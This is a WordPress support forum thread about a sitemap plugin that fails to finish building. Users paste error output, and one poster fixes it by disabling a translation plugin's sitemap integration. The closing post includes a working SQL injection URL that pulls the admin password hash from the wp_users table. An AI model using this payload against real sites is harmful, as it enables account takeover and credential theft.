    # The last run didn't finish! Maybe you can raise the memory or time limit for PHP scripts. Learn more
    # The last known memory usage of the script was 12.75MB, the limit of your server is 32M.
    # The last known execution time of the script was 0.14 seconds, the limit of your server is 1800 seconds.
    # The script stopped around post number 94 (+/- 100)

I have a vps. I have raised both memory and time limit but still can't get it to build a sitemap every time.

Whilst this happens the majority of the time, there are occassions when the site map is built.
I have added plugin to 4 websites, they are all new sites without much content on yet, all sites have the problem.

I'm running into the same thing. Here is my error:

    * The building process might still be active! Reload the page in a few seconds and check if something has changed.
    * The last run didn't finish! Maybe you can raise the memory or time limit for PHP scripts. Learn more
    * The last known memory usage of the script was 29MB, the limit of your server is 1024M.
    * The last known execution time of the script was 20.62 seconds, the limit of your server is 100000 seconds.
    * The script stopped around post number 15351 (+/- 100)
    * If you changed something on your server or blog, you should rebuild the sitemap manually.
    * If you encounter any problems with the build process you can use the debug function to get more information.

I do have 20,000 posts, but I raised the memory limit and script time execution to high levels. Would anyone know if this is limitation with the plugin or not? It may be very well my hosting company, but I'm not sure. Is there anyway out there that has a huge amount of wordpress posts and uses this plugin successfully? If so, what did you do to optimize it? I'd really like to get this problem resolved.

It seems that there is no support here :-(

Anybody know of a site map generator that will work? Or if it doesn't at least you can get support?

I SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:

If this aint your problem try increasing your memory or learn .htacces
If it is look, down here now.

    GO TO YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php

Now scroll a bit down and uncheck this: Enable sitemap integration

Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is

    /wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),
    666,CHAR(58))+FROM+wp_users+where+id=1/*
